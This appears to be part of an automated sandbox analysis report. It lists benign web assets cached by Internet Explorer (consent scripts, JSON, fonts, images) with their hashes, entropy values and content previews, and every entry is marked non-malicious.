IBEbxHrgnN/Gg8f63Gm38BfRhPwY9jyGR4BVP5x9JfC25oat/nW5N9hsZK4H3odqROuDY1SLvkBdWreTBxuU7rg4+ElAElRzRpH7cgRPr2JzG5yQU6U48Q1okD1LB3zkfFgtMF5ohCVpr8MT7Qu4QP8snPprFkRnteN1q4kSkhMQxN/P4DqRE/nTEqAHLHAl2+ELmI3QRBRGNjSe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\V[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	303892
Entropy (8bit):	5.999911965441764
Encrypted:	false
SSDEEP:	6144:M0oQobemDcjP/5CnLNwm7pmtd01+syjJ4ZmboZO3YH/RikQo:MoNmIjP/YnLN1Ad00syOJUYH/RHQo
MD5:	49F9E6B7D1740AAD64B09FC4F2273957
SHA1:	B6C6DA5294EC9EE65C46B6FD0068E1E0A3D05114
SHA-256:	6629C6AA5479336513E242D52EF469C34DCF71888C92920987767B76FAD93FB5
SHA-512:	0C7AB56F1A22A8DDD904EE432EEFEF2E6007BC61BACBBDF39609E690E77E18A360CC780D69CF8103A61E3C250082F6FD870E675C66A3389CDF9E4DB0DD46A98C
Malicious:	false
Preview:	grWALJ0AoRryMhLkb4+5fKF1BT3DlVu3juzEHaw/ZvSESmQvXQ8nkp0Y9RkdWgiz1iOK1D8NUr9iZdsdFr81JmpWg9txndzVGT0e6+TBYQEfcePQYnouQ3nEZTcDuRTcVVKp4MvyoAE76gDZYZb1U7TO6gWF5xGaEYDPRhX6KuBEDLnpKJYNxnZ/psk5Z/xirUQuqr5nQ8dCwbvnIa/DgDYf5CjgdswkgrrHo4q07m6Ae9mB+SF4L6qM5V+gw0a3LpeKTuWSy31lovo18D6cCZIfNM0yMsAqQjxDW0YaSyVeMTju6tvvYy5mUbusap7WImAWmagHKn0QCRYR37dI2nspX1DORs+15QbqbLOwsgLcdfeV6kwcHDhd4pMLLps1qlAISORQR2K4D6JYl8Xq1O7KUgusM+rMcQl9vBoETj9pSthap92AjnRviz2tnD/2Usrtc0xl2Z4Yq7m0blzYMFe6uuaryeEpJdPPBaL6wgUz9rztXxEpGFSahrl3L9s4W/6W0fGVOzma0VVbFaUmG2EyQzRRfoBnwVTGlvQE1qZ5s9Mls+SyBo1/53hkYZp1n/JjFxoF8dD4Gkwr7KaVjw55NcVyHrMIzwjEj90Bvq1PJjdxVwy31XpJoWT5Dhn/sFDc73O1eYqGXOJ7fs/N3abD/3eKczP+sfqppSw9YgTRoS2/z1kqQODUzACupI4fcRcWCnpt8iIJEzMHE9oxc3nfbgGjm9kiDUxjXUygDaYlIDsc/E9RQGANNoKEgjLPEGVsdtWEHco+3u4ZY83rwynN0vaCFNO6rH56zjEISxHsVjjanmdcG1WaPfHCg3y2hqilTaXF7+Tvp8vZr5Lue5i0lFSlFGbHcYYlDDUJ7Q3qlkpwftPeSThk0afer0GwmBoGHXsABQW3yPKsOa3W7y/3jybUSoPNvNriWF/eD0aqcoF7A8lxcD2GVca6TMq7qEJEla4+PUv4oVGr/x2gwry2iuOig5O6+rY1nS4F

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\a5ea21[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	758
Entropy (8bit):	7.432323547387593
Encrypted:	false
SSDEEP:	12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
MD5:	84CC977D0EB148166481B01D8418E375
SHA1:	00E2461BCD67D7BA511DB230415000AEFBD30D2D
SHA-256:	BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
SHA-512:	F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Preview:	.PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cfdbd9[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	740
Entropy (8bit):	7.552939906140702
Encrypted:	false
SSDEEP:	12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
MD5:	FE5E6684967766FF6A8AC57500502910
SHA1:	3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
SHA-256:	3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
SHA-512:	AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
Preview:	.PNG........IHDR................U....sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..\|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\consent-management[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	6459
Entropy (8bit):	4.8333068624932025
Encrypted:	false
SSDEEP:	192:OFbKkUehaqqeuiS4X5ipK2OhSQvvu3KqE3:gbB/sihh
MD5:	DC793DAA3072E0EB2CD3264A8DE0F5FE
SHA1:	BBED7CBC0438466EAD30175F34750415DB028FA2
SHA-256:	64C4461F300AEEE4BCB2AE92B5F75770042A7313EE4086998B236662BC367653
SHA-512:	E19757B7FACFEA3B959ED37A16D0993114594717194A83CCF20E88EF60BF6CF3D0FC56B522EBF8BEE3F0D6BC0751BE804F7592B05C5D6B35E8497672FA824493
Malicious:	false
IE Cache URL:	https://s.uicdn.com/mailint/9.1722.0/assets/consent/consent-management.js
Preview:	(function(window) {. /*. Hides the error message. /. function hideErrorMessage() {. // hide the fallback error message. // TODO: would be better to display the message only if the layer doesn't appear. if (errTimer) {. clearTimeout(errTimer);. }. var error = document.getElementsByClassName('error')[0];. if (error) {. error.style.display = 'none';. }. }.. /. Redirect back to the referrer page. */. function redirectBack() {. hideErrorMessage();.. // check if cookie exists (CADNPCA-7252). if (!hasCookie('euconsent-v2')) {. track(window.ui.trackingURL.error + '?code=missingEuConsent');. } else if (!hasCookie('uiconsent')) {. track(window.ui.trackingURL.error + '?code=missingUiConsent');. }.. // perform the redirect. try {. // set a mark for brain tracking CADNPCA-7305. window.sessionStorage.setItem('_rfcp_', '1'); // Redirected From Consent Page. var hash = window.sessionStorage.getItem('redir

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\core[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	1279
Entropy (8bit):	5.0198083787959655
Encrypted:	false
SSDEEP:	24:hYH0XISu+rUaKZSDof9sMahpmDgsM/O0LE9sujrNINVafHLVk+8m/OPmNV+kq/1x:J4SuirKZusCpa4XLArBHW+8fUDwgu
MD5:	499CD75790ED825D5519151AC2863D87
SHA1:	65FB695B805B509F2B6FA090A0B15BD48E6910DE
SHA-256:	3EA5E0E90899FB923961E68D33AFA4A0E5A78C715E20F8961223925754066FAF
SHA-512:	8F2D8413D09FB6FCF63A155096521DEB5B2FA9956D5BE713435D894A4B6BBBE8AB457CED0ED229E795DBEB51CFEDD92DD281E9C13D7EEF6BFA6A2C43A56594E0
Malicious:	false
IE Cache URL:	https://dl.mail.com/permission/live/v1.47.4/ppp/core.html
Preview:	<!DOCTYPE html>.<html lang="de">..<head>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <title>Permission Core Iframe</title>. <meta name="viewport" content="width=device-width, initial-scale=1">. <meta name="ppp-version" content="1.47.4">. <script>. if (typeof window.Promise !== 'function') {. document.write('<script src="./js/polyfills/promise.min.js"><\/script>');. }. try {. new URL(location.href);. } catch (e) {. document.write('<script src="./js/polyfills/url-polyfill.js"><\/script>');. }. if (document.documentMode){. document.write('<script src="https://img.ui-portal.de/pos-cdn/tracklib/4.3.0/polyfills.min.js"><\/script>');. }. </script>. <script src="https://s.uicdn.com/shared/sentry/5.5.0/bundle.min.js"></script>. <script src="https://s.uicdn.com/tcf/live/v1/js/tcf-api.js"></script>. <script>. if (!window.Sentry) {. window.Sentry = {};. }. </script>. <script src="https://img.ui-port

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\de-ch[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	79097
Entropy (8bit):	5.337866393801766
Encrypted:	false
SSDEEP:	768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
MD5:	408DDD452219F77E388108945DE7D0FE
SHA1:	C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
SHA-256:	197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
SHA-512:	17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
Preview:	{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\droid-bold[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 65364, version 1.0
Category:	downloaded
Size (bytes):	65364
Entropy (8bit):	7.99230051933347
Encrypted:	true
SSDEEP:	1536:Zrru6NXsTzHGIYpVPssuzNAZ9XbYQNDPlL:ZrK2eYUrzNAZ9rdNDPlL
MD5:	8B4A726986A82F5D1D74951FC2186838
SHA1:	E1F9C9F69ACDA748A9EE36D1989B1BA9982C324D
SHA-256:	01F4382A4EDE1FADCE5FA1CB3C83B0EA84E0BD156E3C9F0FBF82010F0485346C
SHA-512:	3FA4D21053B37D7909E9BE755D795A84D74276F0B4F8C3F644F3156EBB744B4BEC611AB5B550CFCD9510F63711295BBD01E5B4F368026EE5AA97A1D86F44D2A6
Malicious:	false
IE Cache URL:	https://s.uicdn.com/mailint/9.1722.0/assets/webfonts/fonts/droid-bold.woff
Preview:	wOFF.......T................................FFTM...8........_c.7GDEF............'.dGPOS.......O..bN...VGSUB......8...P.<.KOS/2.......`...`....cmap...`.........lD.cvt ............K.RQfpgm...\...7....s.#.gasp...............glyf............l*head.......6...6.yW.hhea.......!...$....hmtx...p.......x...loca..............P.maxp....... ... ...bname.............w.post...\|.......A..L.prep.......&...beq.........N.-\_.<...........2......u.R.r..................x.c`d``..'......._%.a...2`...............^.....y......./.Z.....&.................3.......3.....f..................@. [...(....1ASC. . .........m.. ........^..... ..x..V]H.W.=;s..,"%..A......A.."....Y.. .J....a...!.)!.R.E..<."..)E....T+AJ..J.....J..H...\|..$f.K....;..w..1...^.....0..a.^@....E..a.i..M.F..C..F.a..[.q..N.M...1.Dt...L...D........@.{.).........jf....=......]......P...,..~.6.g.1...v.......vn.C..T..o.;L/..@.....2..!...S.)S..C........n9.p..t..7......y....c..B..Vx...<w......t....N.EL-c.9^".c...}......uL:u..>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\droid-normal[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 61804, version 1.0
Category:	downloaded
Size (bytes):	61804
Entropy (8bit):	7.993654137588428
Encrypted:	true
SSDEEP:	1536:wErSmv+AzK94ZKMKFO5SLRFQy0gw6Xgiy+AUuyi4vdM2QM:w+Bnz+4EVgSRFQhxZibAUli41Zl
MD5:	E77AD93F5E931DD5463E5390ADA74919
SHA1:	5E7D4F84636B5EB234400031139E27D951E0CDCE
SHA-256:	F76C90EFCA92F37B1CF87A05BA969B5E6F34FDC5D40C9023FF655E608905B2E0
SHA-512:	DD8F989BEE14DDAEF39E204167D82BB9B6AF4307DEEE77D3AD2FA3D92EFE2F4563E5D6E44A98E4E75AFA172F3B60485CC79E0669C5CDBC499EBFF7846FE00C41
Malicious:	false
IE Cache URL:	https://s.uicdn.com/mailint/9.1722.0/assets/webfonts/fonts/droid-normal.woff
Preview:	wOFF.......l................................FFTM...P........_c.CGDEF.............'.eGPOS.......7..].n...GSUB.......8...P.<.KOS/2......._...`...dcmap...L.........lD.cvt ............9.=.fpgm...H...7....s.#.gasp...............glyf.......7.....]j)head.......4...6..W.hhea.......!...$...yhmtx...l.......\|l...loca................maxp....... ... ...>name...........W...dpost..........P...Rprep.......f....;..x.c`d``...{...6_..9.@..,c0}..V....r\|a...r00.D.C...x.c`d``..'.....o..E._..".).............._.....z......./.Z..........x.c`f)b......:....Q.B3_`Hc..............i...B4.....3.:.;3....e..'.....X..a>H..u..R``.......x..V]H.W.~..}qR..."CD$.q.$.2.K..A....B..(!..."E.QDJ.......R.."E.....)C../....Y.2:....y..D\h.......<..9v....&.Op.E....i..\..._B!...^.....G...d.".R(z/.d.g..1...7.ib..\..S...u.<R.1.....c.c.%...s.....oc...~=a.....~.'.b...L..K..I..[...O.I..O\|.5.(..Vr....../l)v.f0a.Q1.i.:..w..6...D.K`.K..LM.x.*.oK:."sL....8m............."....cG.j.g..1$...2...Y.....!s.....g.>7...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_573df68c2f40e432c263344397200356[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	34412
Entropy (8bit):	7.974645212878982
Encrypted:	false
SSDEEP:	768:2d8ugPm/pDMGhpAEgEK4gRvX5MfblPc4U8IPT/+prr+/bPL:2duaAEs4g15giV8W+R0bj
MD5:	03E5B2D7035935D8232644B3EF2C944F
SHA1:	B5434862FDC2FA3FD2E1FA5E58B8978EA7B50629
SHA-256:	5664A712E31CA2D2EB45A12F66EB467B14E4EE7BE28F6124F6EA90173104A9E2
SHA-512:	6F4366B6390C5E27EA5C3E25B34BB202E23DFE7BEAFCA749681E30FAB05E9453978D6F6D8905EBB143DC7E897D678CD8C613C9088A5205BCD6244B78C4586901
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F573df68c2f40e432c263344397200356.jpg
Preview:	......JFIF.....................................................................&""&0-0>>T.............................+......+&.%#%.&D5//5DNB>BN_UU_wqw.........7...............5..................................................................~....._......JI.#.GH.........@.@`....j{.@HP...ZOHh...m..0.=...m....H.).....sj4q.L..h...d..\|..........@..h........GFzbAL-...$p..Z!.....-.. ].3.'..c.r.!.X._;m.......-..j\.. -...X..l...;...m'..?..]..3.O.Q ...zA.."N.0H.p<.a-...G..?7...............l..J..4....................4..{R)....R.}....x.t3..q.}_!.\|.{9H.,.j$V.?.C....`...<.\....7....i.g.g..,.....\...f...7.........~..n@.4.#..OS.<.2.....B.z-..F."...7x...B........-o.S..<..^}.l.85..1......;..0.C......O.:z^<.&\|......>]...,..:.k....k?..^z...........o#.gk....y.;....4.......X.............C.@.y./-...z3.zym:Z.....~_Nq..*ez.....D....3.}..;;.r.#...N..(.:..S....EaN^.VM..~...sy...,.....Q>..:qi.7...sy....=.z...hh......r..o=1..Og..j[..x....+@.6.+L.....".o.......%...A.z....[p...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_952fa311718bc056fbc712720fda8303[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	37686
Entropy (8bit):	7.98471833135155
Encrypted:	false
SSDEEP:	768:26uEs3nw/q3qtvH5pVEOAOmZP8fV7ZjH5YOd3wi5X/h6BsaEmC2rF3lYqRkB/Z:snw/2q15fEOnCP4V1b5Y0PX/oWLa3W
MD5:	D9AD4DF814FA717D034E474340946CD8
SHA1:	C7D45B437DE0E9B9D2BFD2A0781C3C31CDBFFBDF
SHA-256:	BF88ECD416413716D4FE06CCF6730883BC6E55AF4E898CAE0412429DF2891CD9
SHA-512:	5FE9CC9BF12668F0000B0A134B79D4352C9D8DDF2C2835A93041981F22ECBDA941D0F36761963E698974D00ADE9F83EE24C9E4C1ACA1FD1104591AB417BABAA4
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F952fa311718bc056fbc712720fda8303.jpg
Preview:	......JFIF.....................................................................&""&0-0>>T.......................................................&""&0-0>>T......7...............8........................................................................Nc...ag.R...9i...n..Nm.I.3. =...m1W...&....Y.11.$..P.@..b.3&.lIo^.)E..w....`.[.q..9.X...C.~....Dx.cn....9....y....d..T...-L...QQ... ......Cw..;...#.t......j..._.y.hH.==...-...._.Z..A...h+.}S.... <.....vD.....E.<..v..i1m...M.mPNG..ws.A......$H..Q....m.h....`d.d\.9....~.ia2.h.....>ns;1.Z...o....P...y.\|.$E...8{4a.{....S..ZY...Q.L..q...q..V.....A&2g.s-.s....e..-......9i.z.]{.4E..Q..{5$s-...n....2.t3....d.i....=....z..p ...'9y..+fz.^.ir..)F.U....9.(.y.,U.z6.....N.fI. ....ug....q...I4D...X.V.F......`..D..K.!..!../Y LeS.g.a<].....WT.d.#.8.x1g.-....RkI....k..E....\|.7wZ&..a.6dS..J..)Mhe.Rg..o..&..Ed.FDb..\.LT.....F!4..lR..6.Lj._(...oN/...8I.4...m@_.]..,..W.U..Z..u.:..ix."J@....a.m.W....N..g......;@.C,k.;B...4

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\http___cdn.taboola.com_libtrc_static_thumbnails_d6d46d338affb3594713ba2d27fe615e[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	16004
Entropy (8bit):	7.968216701887388
Encrypted:	false
SSDEEP:	384:RBQcfqwBDiwmfywWo5SyNT5jNfzEV5JGqLa:b1jpVbI5rNTXfzyRa
MD5:	EE50C2CC9CA747B74709E3CF94095E69
SHA1:	40A7BA878F3C7B69E4F5C8320E039118D4C66D9F
SHA-256:	1BF1F868CA2530B9313A80E4A7164FC2E49E7DC67B6B16883E89895F3FE0ECE6
SHA-512:	9ACE4B5B282E47B483DE7F8093E39701DC988460F01CEC14C715D3B0FAAEE28152C2E3BBF71CFE38E2DBA88E57F822327521D283D7A7F23CF96ABD6BF1FA974D
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fd6d46d338affb3594713ba2d27fe615e.jpg
Preview:	......JFIF.............C....................................!$..( ..%2%(,-/0/.#484.7./....C.......'..'S7/7SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS......7......................................................................................Y.&RHQ..&...a.+w#..a....!O.\.X%....rY.....Fu.q2.$...J.JB.......e,....Y.1....7re>#.Z.P.M.....`..YcU2..k,..yW.`..M...;..$K.<.K.AC....+`{......U.:F2U(.W....].M...5.6...O .x%.....M"..A.hm..s.B.4..Y.ez.........$6@....r..Z...t. .k]9s^.w(..%...q.u....t._l...)W.N1...\..L.t....}>dl0FVu.{M.(..IX.......:j!.>.).D...y.."......F.&..7.Y..1.).@.. ...:.,...rK.....ma....z\|..\Z.L.......L.A....6.,.Y.^..urb.).V...=-7..n.9......Y.1. lMd..6)g......,Sm.;+......,.r..\xgo3x.tR.\|u...cDgcZdC.=VS;[.#.f....g.3.IwQ...y\|...6..b.V..n}H...b0=..uG...\.V..d"..im...'....o.......t".\|...%..Y.....u......6..+...+.....{Z.x...vW..._.3.D.vodbn>......Z..W..J.n..c.m.5......n{.._..D......:...4/R..C..h.....-bt........t...}..}...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\iab2Data[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	242382
Entropy (8bit):	5.1486574437549235
Encrypted:	false
SSDEEP:	768:l3JqIW6A3pZcOkv+prD5bxLkjO68KQHamIT4Ff5+wbUk6syZ7TMwz:l3JqINA3kR4D5bxLk78KsIkfZ6hBz
MD5:	D76FFE379391B1C7EE0773A842843B7E
SHA1:	772ED93B31A368AE8548D22E72DDE24BB6E3855C
SHA-256:	D0EB78606C49FCD41E2032EC6CC6A985041587AAEE3AE15B6D3B693A924F08F2
SHA-512:	23E7888E069D05812710BF56CC76805A4E836B88F7493EC6F669F72A55D5D85AD86AD608650E708FA1861BC78A139616322D34962FD6BE0D64E0BEA0107BF4F4
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\icon_signup[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 40 x 41, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	1090
Entropy (8bit):	5.626909540375438
Encrypted:	false
SSDEEP:	12:6v/7qRkb0CQAmZPUwW5NQOku4vZvaPaufnvlejYAwUbvV8zeJtTwZAPfem:TMMPUwsYmFnv00AwUbdHJWAPx
MD5:	F435818B6FE3361F764EB6B9DC8398F5
SHA1:	7E0BDA605342881CDB584531E28F9AC299EE7776
SHA-256:	284E637E5BB88498C9C4680B018A56DD650A7C82C193B6045BFC52FC54B7D1F0
SHA-512:	883CB778EE663C4153D51DFD95BB1D2435533EB343C85C3113DFCE333E70DD7E80355C10DD4CF40FE8F7869A1AA209DF68CF991B07BE0B526C8FC83E9DCC6A08
Malicious:	false
IE Cache URL:	https://s.uicdn.com/mailint/9.1722.0/assets/navigation/icon_signup.png
Preview:	.PNG........IHDR...(...).....p\|......PLTE...................................................................................................................................................................................................................................................................................................................................................................................................................................mp....tRNS..................... !"#$%&')+,3579:;<=>BDFGHIJKLMT[_ahijklmqtuwxz{\|}...................................................................J..\|....IDAT.....C.`...w.P...<.4-..-.;...".P.,....dh....m.6a.=......mS.T....!...#.F..c....v.....^b..Ux.o0....1J$.6M.I..tJ.-...D..Q8z.E.PL...!%.n....>J..].i..0.`....:...4....p^..%...R.%C.%..k.+....-k..>.p....>..H.<....=..`.P....4.O.....`.<-.+.".$s.aR.X..O(......c0).X-......T...&.1]V.N.}.PRt....p....bY:....zJ.l+.2K.B...3z...!<C..!.........M?..zA.3..Y...E.....J.~.!..V..kZ

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\location[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	182
Entropy (8bit):	4.685293041881485
Encrypted:	false
SSDEEP:	3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
MD5:	C4F67A4EFC37372559CD375AA74454A3
SHA1:	2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
SHA-256:	C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
SHA-512:	1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
Malicious:	false
IE Cache URL:	https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Preview:	jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\logo_1and1[1].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1215
Entropy (8bit):	5.167110094240277
Encrypted:	false
SSDEEP:	24:2diNAsLfE7veeugvRovdntQ+7xJhBN/WY4XcYJDAfF7ABsImJG6:ccAkfECeuq2VtQ+7bhB9WmYl+0hMG6
MD5:	0B2F6E4FCD71B727583C0B453D2F5AF8
SHA1:	28ABB1DE0B1827624456920F24C53C7A980161AC
SHA-256:	0EBC0A49DAFEC7FC998FD1BA81AFA1DBF8E322056900EFD87E569B5BBF825B1C
SHA-512:	797537F3809DEE867A815E3BE5BC182B4341AEF8D6C50C785EB88BB209E01C5FF5A9118CED066CC7EE38F490101FF49CD23E6E50CC043ADBC0FFA8BC72BEA315
